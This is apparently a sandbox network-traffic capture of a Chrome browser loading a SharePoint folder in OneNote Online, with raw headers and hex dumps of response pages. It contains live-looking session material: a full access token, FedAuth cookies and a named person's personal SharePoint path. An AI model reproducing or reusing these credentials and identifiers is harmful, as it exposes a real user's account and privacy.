                                                X-MSEdge-Ref: Ref A: DBE862B9648E41DBB63421ECCCB6E219 Ref B: AMS231032606019 Ref C: 2022-10-03T13:38:35Z
                                                Date: Mon, 03 Oct 2022 13:38:34 GMT
                                                Connection: close
                                                2022-10-03 13:38:35 UTC535INData Raw: 32 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 0d 0a
                                                Data Ascii: 26<!DOCTYPE html PUBLIC "-//W3C//DTD XHT
                                                2022-10-03 13:38:35 UTC535INData Raw: 34 39 32 0d 0a 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 35 30 30 20 2d 20 49 6e 74 65 72 6e 61 6c 20 73 65 72 76 65 72 20 65 72 72 6f 72 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79
                                                Data Ascii: 492ML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>500 - Internal server error.</title><sty
                                                2022-10-03 13:38:35 UTC536INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                29192.168.2.34982813.107.6.171443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampkBytes transferredDirectionData
                                                2022-10-03 13:38:35 UTC530OUTGET /o/AddinServiceHandler.ashx?action=laststoreupdate&app=4&lc=FR-FR&WOPIsrc=https%3A%2F%2Finsacentre%2Dmy%2Esharepoint%2Ecom%2Fpersonal%2Fchristel%5Fchevereau%5Finsa%2Dcvl%5Ffr%2F%5Fvti%5Fbin%2Fwopi%2Eashx%2Ffolders%2F5c627324b4e64967a31a5c2e2767a2a0&access_token=eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsIng1dCI6ImFrUFRFTzRYU0N4c3hXOTBHMl9Zd1lWRGdIYyJ9%2EeyJhdWQiOiJ3b3BpL2luc2FjZW50cmUtbXkuc2hhcmVwb2ludC5jb21AZjc0MjE0NTAtZGYxNi00NzE0LWFkYTEtMzk1MzkwY2I5MWQzIiwiaXNzIjoiMDAwMDAwMDMtMDAwMC0wZmYxLWNlMDAtMDAwMDAwMDAwMDAwQDkwMTQwMTIyLTg1MTYtMTFlMS04ZWZmLTQ5MzA0OTI0MDE5YiIsIm5iZiI6IjE2NjQ4MDQyOTYiLCJleHAiOiIxNjY0ODQwMjk2IiwibmFtZWlkIjoiMCMuZnxtZW1iZXJzaGlwfHVybiUzYXNwbyUzYWFub24jNGMyYmRlM2RjNmYxYmRkOTJiMTQ2ZmVkN2E2ZDI2NzNiZTZhYmEzOGU4MmRhMGYzNzhlMDNmODAzYTE2MTY0YyIsIm5paSI6Im1pY3Jvc29mdC5zaGFyZXBvaW50IiwiaXN1c2VyIjoidHJ1ZSIsImNhY2hla2V5IjoiMGguZnxtZW1iZXJzaGlwfHVybiUzYXNwbyUzYWFub24jNGMyYmRlM2RjNmYxYmRkOTJiMTQ2ZmVkN2E2ZDI2NzNiZTZhYmEzOGU4MmRhMGYzNzhlMDNmODAzYTE2MTY0YyIsInNoYXJpbmdpZCI6IlkzbSt5S21nQWt1SEsrbFFjWjJSL3ciLCJpc2xvb3BiYWNrIjoiVHJ1ZSIsImFwcGN0eCI6IjVjNjI3MzI0YjRlNjQ5NjdhMzFhNWMyZTI3NjdhMmEwO01NSW9kVHVrMnhacDRTTFIyUlQ3cU9HcTNsTT07RGVmYXVsdDsxMmNlNzM1ZTFmNGM0YjkyOTQzNGQ5Nzk4YzJmY2JiOTs7VHJ1ZTs7OzA7ZTcwMzZiYTAtNDAwNC01MDAwLTQ3MDQtOGM3OTc3Zjk2M2M5In0%2EEWb66LDcPK9or86SYiXEnS8X85go%5FGF6jrytmNe%2DVM0DP1xedkdH8%2DP7maQkiGV1uoKn2Q3P4K07W8GXPgYZ5y8fXzywqlJykkoJzCJPRAx6O%5FcBiZszwxDu1rJtgjSTldsdPBQi%2Dx4isn%5FtXs1kVY3k0U38ib%2DUTDhESo5GkrQ59aM3v5L0NqOv7JFyPd5UFya1amQrzflYMZLjlIR7Cpl8sbK80iNccduMe%5FYJ8j12fHoZippN9rN6taMKDu9wT0A9JTtAxplzwDJbTKBuRr6bA7EzroK8GpTlnMKJldwuHWyPyVYQHIAwW8osIl11pJ4nzIiwd96ynH3CffKLmQ&access_token_ttl=1664840296804 HTTP/1.1
                                                Host: euc-onenote.officeapps.live.com
                                                Connection: keep-alive
                                                sec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"
                                                haep: 1
                                                X-WacFrontEnd: AM1PEPF000094C7
                                                X-UserSessionId: f4fb35ab-872b-4831-80cd-60f1741f9c31
                                                sec-ch-ua-mobile: ?0
                                                X-OfficeVersion: 16.0.15707.41015
                                                X-Key: 5CkbCfV/c5WRPlfo2bTVsG0FKIqu826w6sof/5159dg=,638004010975601703
                                                X-WacUserAgent: MSWACONSync
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                X-Requested-With: XMLHttpRequest
                                                X-UserType: WOPI
                                                X-xhr: 1
                                                X-IsCoauthSession: true
                                                X-WacCluster: GEU2
                                                sec-ch-ua-platform: "Windows"
                                                Accept: */*
                                                Sec-Fetch-Site: same-origin
                                                Sec-Fetch-Mode: cors
                                                Sec-Fetch-Dest: empty
                                                Referer: https://euc-onenote.officeapps.live.com/o/onenoteframe.aspx?ui=fr%2DFR&rs=fr%2DFR&wopisrc=https%3A%2F%2Finsacentre-my.sharepoint.com%2Fpersonal%2Fchristel_chevereau_insa-cvl_fr%2F_vti_bin%2Fwopi.ashx%2Ffolders%2F5c627324b4e64967a31a5c2e2767a2a0&wdenableroaming=1&mscc=0&wdodb=1&hid=E7036BA0-4004-5000-4704-8C7977F963C9&wdorigin=Sharing&wdhostclicktime=1664836694371&jsapi=1&jsapiver=v1&newsession=1&corrid=f4fb35ab-872b-4831-80cd-60f1741f9c31&usid=f4fb35ab-872b-4831-80cd-60f1741f9c31&sftc=1&cac=1&mtf=1&sfp=1&readonly=1&wdredirectionreason=Force_SingleStepBoot&rct=Medium&ctp=LeastProtected
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                Cookie: BIGipCookie=000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000; PrivNote=-1; WacUPToggleState=%7B%22CCS%22%3A0%7D; GEU2-ARRAffinity=6d4bbee26ee2cd267faa982251fa1253c2809c10aef235fbcf94243ec19857ca
                                                2022-10-03 13:38:35 UTC536INHTTP/1.1 403 Forbidden
                                                Cache-Control: private
                                                Content-Length: 1233
                                                Content-Type: text/html
                                                P3P: CP="CAO DSP COR ADMa DEV CONi TELi CUR PSA PSD TAI IVDi OUR SAMi BUS DEM NAV STA UNI COM INT PHY ONL FIN PUR"
                                                Set-Cookie:
                                                X-CorrelationId: 29e95b3b-2d2c-4583-9918-7c697492702c
                                                X-UserSessionId: f4fb35ab-872b-4831-80cd-60f1741f9c31
                                                Strict-Transport-Security: max-age=31536000
                                                Timing-Allow-Origin: *
                                                X-OfficeFE: AM1PEPF000094C6
                                                X-OfficeVersion: 16.0.15707.41015
                                                X-OfficeCluster: GEU2
                                                X-OFFICEFD: AM1PEPF000094C6
                                                X-Cache: CONFIG_NOCACHE
                                                X-MSEdge-Flight: 2i49=afd_wacinfra4,2i4a=afd_wacinfra5
                                                X-MSEdge-Features: tasmigration015,typeheadertest,afd_waccluster,afd_wacinfra4,afd_wacinfra5
                                                X-MSEdge-Ref: Ref A: 22680BBB133A4FE0B994DF86C4D9566A Ref B: AMS231032603029 Ref C: 2022-10-03T13:38:35Z
                                                Date: Mon, 03 Oct 2022 13:38:35 GMT
                                                Connection: close
                                                2022-10-03 13:38:35 UTC537INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 33 20 2d 20 46 6f 72
                                                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>403 - For


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                3192.168.2.34971113.107.136.9443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampkBytes transferredDirectionData
                                                2022-10-03 13:38:16 UTC9OUTGET /personal/christel_chevereau_insa-cvl_fr/_layouts/15/Doc.aspx?sourcedoc=%7B5c627324-b4e6-4967-a31a-5c2e2767a2a0%7D&action=default&slrid=e6036ba0-60ed-5000-3b56-ec6f32cafafb&originalPath=aHR0cHM6Ly9pbnNhY2VudHJlLW15LnNoYXJlcG9pbnQuY29tLzpvOi9nL3BlcnNvbmFsL2NocmlzdGVsX2NoZXZlcmVhdV9pbnNhLWN2bF9mci9FaVJ6WWx6bXRHZEpveHBjTGlkbm9xQUJkV18xMjVNQlg0bXh6bkdybTkzeXJBP3J0aW1lPTNTSGZoa1NsMmtn&cid=b4d974bd-1cf6-430c-b9ae-4dde6b87b7da HTTP/1.1
                                                Host: insacentre-my.sharepoint.com
                                                Connection: keep-alive
                                                Upgrade-Insecure-Requests: 1
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                Sec-Fetch-Site: none
                                                Sec-Fetch-Mode: navigate
                                                Sec-Fetch-User: ?1
                                                Sec-Fetch-Dest: document
                                                sec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"
                                                sec-ch-ua-mobile: ?0
                                                sec-ch-ua-platform: "Windows"
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                Cookie: FedAuth=77u/PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0idXRmLTgiPz48U1A+VjEyLDBoLmZ8bWVtYmVyc2hpcHx1cm4lM2FzcG8lM2Fhbm9uIzRjMmJkZTNkYzZmMWJkZDkyYjE0NmZlZDdhNmQyNjczYmU2YWJhMzhlODJkYTBmMzc4ZTAzZjgwM2ExNjE2NGMsMCMuZnxtZW1iZXJzaGlwfHVybiUzYXNwbyUzYWFub24jNGMyYmRlM2RjNmYxYmRkOTJiMTQ2ZmVkN2E2ZDI2NzNiZTZhYmEzOGU4MmRhMGYzNzhlMDNmODAzYTE2MTY0YywxMzMwOTI3ODE5NjAwMDAwMDAsMCwxMzMwOTM2NDI5NjUxNjMyOTksMC4wLjAuMCwyNTgsMjJhNzdhYTQtYjFkNS00MDJiLTkxZmItYmI2MThhM2I4YmVhLCwsZTYwMzZiYTAtNjBlZC01MDAwLTNiNTYtZWM2ZjMyY2FmYWZiLGU2MDM2YmEwLTYwZWQtNTAwMC0zYjU2LWVjNmYzMmNhZmFmYixZM20reUttZ0FrdUhLK2xRY1oyUi93LDAsMCwwLCwsLDI2NTA0Njc3NDM5OTk5OTk5OTksMCwsLCwsLCwwLCxtaHFjWnNqWUxCRjRjcGo3UDlReDhkdHFmOWVLMlp0d3B5NnNPVjF5OTJockVHVTM2M3pVZ0xLeVI4S0JjK3lpeVkxbmhWQ3EvOTRJbVRlV2pObkpNM3lRM29sUHJpcm1GTGJyTk9JUzZPRnBhNFUrNGV6T0xhMjNLOGdlTUc2Um5pUVVTOFp4YWNtVjJlMWEwNkNmamZ1VmljR1lXNnRZZVREdVlHZnF6Sy8zTFZsQ2dPWlQ1eUdJM2EyK1VTczBuK3BTQk1neFBRLzZzRnEvYW1WTlp3MXNDRHZiaXZzajFsNjQwdFFjV3NVQUJRbnJTUk0rdThJbEljNC9GUDh5QjUrUjJ1RXZYTUlyM21SdGxXTTRmV1l4SzNGeFYxVW8rZTZlb1pVVEhGU25jR1NIUU92NmFhc3g3SjNieEhxTXJPMlVKUXh4V01pSkhXa2hqR292b0E9PTwvU1A+
                                                2022-10-03 13:38:16 UTC12INHTTP/1.1 200 OK
                                                Cache-Control: no-cache, no-store
                                                Pragma: no-cache
                                                Content-Length: 74782
                                                Content-Type: text/html; charset=utf-8
                                                Expires: -1
                                                P3P: CP="CAO DSP COR ADMa DEV CONi TELi CUR PSA PSD TAI IVDi OUR SAMi BUS DEM NAV STA UNI COM INT PHY ONL FIN PUR"
                                                P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                Set-Cookie: FedAuth=77u/PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0idXRmLTgiPz48U1A+VjEyLDBoLmZ8bWVtYmVyc2hpcHx1cm4lM2FzcG8lM2Fhbm9uIzRjMmJkZTNkYzZmMWJkZDkyYjE0NmZlZDdhNmQyNjczYmU2YWJhMzhlODJkYTBmMzc4ZTAzZjgwM2ExNjE2NGMsMCMuZnxtZW1iZXJzaGlwfHVybiUzYXNwbyUzYWFub24jNGMyYmRlM2RjNmYxYmRkOTJiMTQ2ZmVkN2E2ZDI2NzNiZTZhYmEzOGU4MmRhMGYzNzhlMDNmODAzYTE2MTY0YywxMzMwOTI3ODE5NjAwMDAwMDAsMCwxMzMwOTM2NDI5NjUxNjMyOTksMC4wLjAuMCwyNTgsMjJhNzdhYTQtYjFkNS00MDJiLTkxZmItYmI2MThhM2I4YmVhLCwsZTYwMzZiYTAtNjBlZC01MDAwLTNiNTYtZWM2ZjMyY2FmYWZiLGU2MDM2YmEwLTYwZWQtNTAwMC0zYjU2LWVjNmYzMmNhZmFmYixZM20reUttZ0FrdUhLK2xRY1oyUi93LDAsMCwwLCwsLDI2NTA0Njc3NDM5OTk5OTk5OTksMCwsLCwsLCwwLCxtaHFjWnNqWUxCRjRjcGo3UDlReDhkdHFmOWVLMlp0d3B5NnNPVjF5OTJockVHVTM2M3pVZ0xLeVI4S0JjK3lpeVkxbmhWQ3EvOTRJbVRlV2pObkpNM3lRM29sUHJpcm1GTGJyTk9JUzZPRnBhNFUrNGV6T0xhMjNLOGdlTUc2Um5pUVVTOFp4YWNtVjJlMWEwNkNmamZ1VmljR1lXNnRZZVREdVlHZnF6Sy8zTFZsQ2dPWlQ1eUdJM2EyK1VTczBuK3BTQk1neFBRLzZzRnEvYW1WTlp3MXNDRHZiaXZzajFsNjQwdFFjV3NVQUJRbnJTUk0rdThJbEljNC9GUDh5QjUrUjJ1RXZYTUlyM21SdGxXTTRmV1l4SzNGeFYxVW8rZTZlb1pVVEhGU25jR1NIUU92NmFhc3g3SjNieEhxTXJPMlVKUXh4V01pSkhXa2hqR292b0E9PTwvU1A+; path=/; SameSite=None; secure; HttpOnly
                                                X-SharePointHealthScore: 0
                                                X-AspNet-Version: 4.0.30319
                                                X-DataBoundary: None
                                                X-1DSCollectorUrl: https://eu-mobile.events.data.microsoft.com/OneCollector/1.0/
                                                X-AriaCollectorURL: https://eu-mobile.events.data.microsoft.com/Collector/3.0
                                                SPRequestGuid: e7036ba0-4004-5000-4704-8c7977f963c9
                                                request-id: e7036ba0-4004-5000-4704-8c7977f963c9
                                                MS-CV: oGsD5wRAAFBHBIx5d/ljyQ.0
                                                Report-To: {"group":"network-errors","max_age":7200,"endpoints":[{"url":"https://spo.nel.measure.office.net/api/report?tenantId=22a77aa4-b1d5-402b-91fb-bb618a3b8bea&destinationEndpoint=Edge-Prod-AMS04r5a&frontEnd=AFD"}]}
                                                NEL: {"report_to":"network-errors","max_age":7200,"success_fraction":0.001,"failure_fraction":1.0}
                                                Strict-Transport-Security: max-age=31536000
                                                X-FRAME-OPTIONS: SAMEORIGIN
                                                Content-Security-Policy: frame-ancestors 'self' teams.microsoft.com *.teams.microsoft.com *.skype.com *.teams.microsoft.us local.teams.office.com *.powerapps.com *.yammer.com *.officeapps.live.com *.office.com *.stream.azure-test.net *.microsoftstream.com *.dynamics.com *.microsoft.com securebroker.sharepointonline.com;
                                                SPRequestDuration: 77
                                                SPIisLatency: 1
                                                X-Powered-By: ASP.NET
                                                MicrosoftSharePointTeamServices: 16.0.0.22914
                                                X-Content-Type-Options: nosniff
                                                X-MS-InvokeApp: 1; RequireReadOnly
                                                X-Cache: CONFIG_NOCACHE
                                                X-MSEdge-Ref: Ref A: 9363003DB5F447219AD17F5977EB3999 Ref B: AMS04EDGE1115 Ref C: 2022-10-03T13:38:16Z
                                                Date: Mon, 03 Oct 2022 13:38:15 GMT
                                                Connection: close
                                                2022-10-03 13:38:16 UTC14INData Raw: 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 66 72 2d 66 72 22 20 64 69 72 3d 22 6c 74 72 22 3e 0d 0a 3c 21 2d 2d 20 64 6f 63 2f 64 6f 63 32 20 6d 65 72 67 65 20 66 6c 69 67 68 74 20 2d 2d 3e 0d 0a 20 0d 0a 0d 0a 20 20 20 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 20 2f 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 69 6e 69 6d 75 6d
                                                Data Ascii: <!DOCTYPE html><html lang="fr-fr" dir="ltr">... doc/doc2 merge flight --> <head><meta http-equiv="X-UA-Compatible" content="IE=edge" /><meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, minimum
                                                2022-10-03 13:38:16 UTC18INData Raw: 36 49 6a 42 6f 4c 6d 5a 38 62 57 56 74 59 6d 56 79 63 32 68 70 63 48 78 31 63 6d 34 6c 4d 32 46 7a 63 47 38 6c 4d 32 46 68 62 6d 39 75 49 7a 52 6a 4d 6d 4a 6b 5a 54 4e 6b 59 7a 5a 6d 4d 57 4a 6b 5a 44 6b 79 59 6a 45 30 4e 6d 5a 6c 5a 44 64 68 4e 6d 51 79 4e 6a 63 7a 59 6d 55 32 59 57 4a 68 4d 7a 68 6c 4f 44 4a 6b 59 54 42 6d 4d 7a 63 34 5a 54 41 7a 5a 6a 67 77 4d 32 45 78 4e 6a 45 32 4e 47 4d 69 4c 43 4a 7a 61 47 46 79 61 57 35 6e 61 57 51 69 4f 69 4a 5a 4d 32 30 72 65 55 74 74 5a 30 46 72 64 55 68 4c 4b 32 78 52 59 31 6f 79 55 69 39 33 49 69 77 69 64 48 51 69 4f 69 49 77 49 69 77 69 64 58 4e 6c 55 47 56 79 63 32 6c 7a 64 47 56 75 64 45 4e 76 62 32 74 70 5a 53 49 36 49 6a 49 69 4c 43 4a 70 63 47 46 6b 5a 48 49 69 4f 69 49 78 4d 44 49 75 4d 54 49 35 4c 6a
                                                Data Ascii: 6IjBoLmZ8bWVtYmVyc2hpcHx1cm4lM2FzcG8lM2Fhbm9uIzRjMmJkZTNkYzZmMWJkZDkyYjE0NmZlZDdhNmQyNjczYmU2YWJhMzhlODJkYTBmMzc4ZTAzZjgwM2ExNjE2NGMiLCJzaGFyaW5naWQiOiJZM20reUttZ0FrdUhLK2xRY1oyUi93IiwidHQiOiIwIiwidXNlUGVyc2lzdGVudENvb2tpZSI6IjIiLCJpcGFkZHIiOiIxMDIuMTI5Lj
                                                2022-10-03 13:38:16 UTC26INData Raw: 39 33 42 44 2d 34 43 32 35 2d 38 35 44 41 2d 34 34 33 41 43 46 38 41 32 31 43 38 22 3a 74 72 75 65 2c 22 35 36 32 43 37 43 43 31 2d 45 46 46 30 2d 34 43 35 31 2d 38 38 38 39 2d 42 43 32 35 36 45 44 32 39 33 39 36 22 3a 74 72 75 65 2c 22 30 30 30 45 44 39 39 42 2d 42 39 31 30 2d 34 45 37 46 2d 39 34 32 36 2d 36 31 41 41 44 35 38 44 37 36 37 30 22 3a 74 72 75 65 2c 22 44 37 45 30 46 44 43 30 2d 32 32 45 30 2d 34 39 45 41 2d 41 38 34 38 2d 38 45 38 46 36 43 39 31 38 32 39 33 22 3a 74 72 75 65 2c 22 44 45 38 41 46 43 42 32 2d 33 43 35 31 2d 34 32 38 44 2d 41 30 38 35 2d 43 37 42 37 41 36 39 36 36 36 43 30 22 3a 74 72 75 65 2c 22 36 36 34 44 43 35 36 35 2d 34 38 33 38 2d 34 35 41 41 2d 39 30 30 32 2d 39 43 38 41 33 45 45 35 39 41 30 33 22 3a 74 72 75 65 2c 22
                                                Data Ascii: 93BD-4C25-85DA-443ACF8A21C8":true,"562C7CC1-EFF0-4C51-8889-BC256ED29396":true,"000ED99B-B910-4E7F-9426-61AAD58D7670":true,"D7E0FDC0-22E0-49EA-A848-8E8F6C918293":true,"DE8AFCB2-3C51-428D-A085-C7B7A69666C0":true,"664DC565-4838-45AA-9002-9C8A3EE59A03":true,"
                                                2022-10-03 13:38:16 UTC34INData Raw: 37 2d 41 42 43 33 2d 42 39 41 38 32 37 35 41 34 38 46 46 22 3a 74 72 75 65 2c 22 39 45 31 37 30 44 31 35 2d 45 45 36 31 2d 34 41 45 32 2d 41 32 45 37 2d 33 45 30 45 38 41 32 45 30 33 39 30 22 3a 74 72 75 65 2c 22 36 38 39 42 46 46 41 39 2d 31 38 38 30 2d 34 35 32 32 2d 41 37 41 41 2d 44 30 41 36 44 35 46 46 44 39 41 44 22 3a 74 72 75 65 2c 22 30 34 33 36 38 34 46 45 2d 43 34 34 38 2d 34 30 30 44 2d 39 42 38 37 2d 32 33 33 41 38 41 31 39 39 43 41 37 22 3a 74 72 75 65 2c 22 30 38 39 39 38 30 37 39 2d 30 30 37 31 2d 34 44 41 31 2d 38 42 38 38 2d 39 38 43 37 44 38 46 33 45 30 41 31 22 3a 74 72 75 65 2c 22 42 41 41 39 31 44 45 34 2d 34 32 36 36 2d 34 31 35 33 2d 39 34 37 45 2d 46 35 30 39 32 32 46 43 33 39 39 34 22 3a 74 72 75 65 2c 22 31 41 45 31 36 46 34 37
                                                Data Ascii: 7-ABC3-B9A8275A48FF":true,"9E170D15-EE61-4AE2-A2E7-3E0E8A2E0390":true,"689BFFA9-1880-4522-A7AA-D0A6D5FFD9AD":true,"043684FE-C448-400D-9B87-233A8A199CA7":true,"08998079-0071-4DA1-8B88-98C7D8F3E0A1":true,"BAA91DE4-4266-4153-947E-F50922FC3994":true,"1AE16F47
                                                2022-10-03 13:38:16 UTC42INData Raw: 43 35 30 31 31 39 42 43 41 46 41 22 3a 74 72 75 65 2c 22 30 32 34 45 30 34 36 38 2d 45 30 41 37 2d 34 31 30 45 2d 39 37 37 33 2d 46 36 44 34 32 37 45 34 34 35 35 42 22 3a 74 72 75 65 2c 22 38 31 45 38 34 32 46 31 2d 46 37 41 37 2d 34 39 37 45 2d 39 30 43 35 2d 45 43 42 39 41 35 39 34 31 38 31 34 22 3a 74 72 75 65 2c 22 35 32 31 34 34 41 43 32 2d 45 37 46 33 2d 34 43 31 33 2d 38 37 34 45 2d 46 38 31 39 43 39 36 31 44 34 34 34 22 3a 74 72 75 65 2c 22 36 43 42 43 36 45 32 42 2d 36 34 44 44 2d 34 38 31 35 2d 39 33 41 44 2d 39 44 43 41 34 44 46 46 35 31 32 39 22 3a 74 72 75 65 2c 22 42 44 42 42 46 32 34 43 2d 44 31 35 34 2d 34 37 39 44 2d 39 44 41 44 2d 42 34 43 32 38 43 37 42 45 41 34 35 22 3a 74 72 75 65 2c 22 46 38 38 36 31 46 46 43 2d 38 33 36 31 2d 34 38
                                                Data Ascii: C50119BCAFA":true,"024E0468-E0A7-410E-9773-F6D427E4455B":true,"81E842F1-F7A7-497E-90C5-ECB9A5941814":true,"52144AC2-E7F3-4C13-874E-F819C961D444":true,"6CBC6E2B-64DD-4815-93AD-9DCA4DFF5129":true,"BDBBF24C-D154-479D-9DAD-B4C28C7BEA45":true,"F8861FFC-8361-48
                                                2022-10-03 13:38:16 UTC50INData Raw: 31 33 46 22 3a 74 72 75 65 2c 22 43 43 36 32 36 34 37 31 2d 41 37 41 30 2d 34 38 43 42 2d 39 46 46 41 2d 30 44 39 41 35 38 38 35 41 44 43 38 22 3a 74 72 75 65 2c 22 36 42 33 44 44 46 39 31 2d 33 44 41 33 2d 34 46 33 33 2d 41 41 31 30 2d 34 42 41 37 37 46 43 32 32 38 42 34 22 3a 74 72 75 65 2c 22 32 36 34 43 37 39 42 32 2d 33 43 38 41 2d 34 44 31 34 2d 39 46 37 32 2d 41 41 30 34 35 34 46 35 33 37 37 46 22 3a 74 72 75 65 2c 22 46 34 39 45 43 30 33 41 2d 30 42 32 44 2d 34 37 39 37 2d 42 30 43 32 2d 33 31 37 33 41 36 45 37 32 46 46 30 22 3a 74 72 75 65 2c 22 30 41 36 38 38 30 46 39 2d 33 36 44 34 2d 34 39 39 34 2d 42 36 39 33 2d 45 43 44 35 44 41 36 46 31 41 43 36 22 3a 74 72 75 65 2c 22 35 36 32 35 35 31 42 38 2d 32 33 37 46 2d 34 36 41 30 2d 39 46 38 41 2d
                                                Data Ascii: 13F":true,"CC626471-A7A0-48CB-9FFA-0D9A5885ADC8":true,"6B3DDF91-3DA3-4F33-AA10-4BA77FC228B4":true,"264C79B2-3C8A-4D14-9F72-AA0454F5377F":true,"F49EC03A-0B2D-4797-B0C2-3173A6E72FF0":true,"0A6880F9-36D4-4994-B693-ECD5DA6F1AC6":true,"562551B8-237F-46A0-9F8A-
                                                2022-10-03 13:38:16 UTC58INData Raw: 65 2c 22 38 32 44 34 35 42 46 34 2d 39 38 34 38 2d 34 43 37 30 2d 42 39 35 42 2d 43 35 43 34 38 33 36 45 44 43 42 35 22 3a 74 72 75 65 2c 22 42 43 38 33 37 34 30 30 2d 44 31 34 37 2d 34 33 37 38 2d 38 44 30 31 2d 46 38 37 35 42 33 37 31 43 36 38 45 22 3a 74 72 75 65 2c 22 36 34 35 41 44 44 34 34 2d 41 39 39 32 2d 34 30 37 43 2d 38 31 33 30 2d 34 31 39 38 45 42 44 46 30 33 43 44 22 3a 74 72 75 65 2c 22 38 37 43 44 44 45 30 30 2d 32 36 41 37 2d 34 44 36 41 2d 41 31 32 39 2d 34 42 42 34 43 46 30 39 32 45 30 34 22 3a 74 72 75 65 2c 22 31 36 33 30 45 31 46 36 2d 42 46 38 38 2d 34 46 36 46 2d 39 33 32 37 2d 43 35 44 39 46 45 32 43 31 37 34 46 22 3a 74 72 75 65 2c 22 41 32 31 31 37 32 43 39 2d 31 32 45 33 2d 34 46 33 45 2d 42 33 43 36 2d 35 45 37 45 35 38 39 38
